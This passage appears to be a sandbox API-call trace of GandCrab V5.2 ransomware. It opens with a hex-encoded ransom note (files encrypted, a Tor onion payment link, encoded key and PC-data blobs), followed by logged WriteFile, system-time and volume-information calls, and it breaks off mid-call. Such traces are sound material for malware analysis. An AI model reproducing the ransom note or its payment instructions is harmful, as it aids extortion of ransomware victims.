(lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.632] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0070.633] CloseHandle (hObject=0x2c4) returned 1 [0070.633] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.633] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.634] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x3b5)) [0070.634] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.634] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.634] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.634] wsprintfW (in: param_1=0x25d0000, 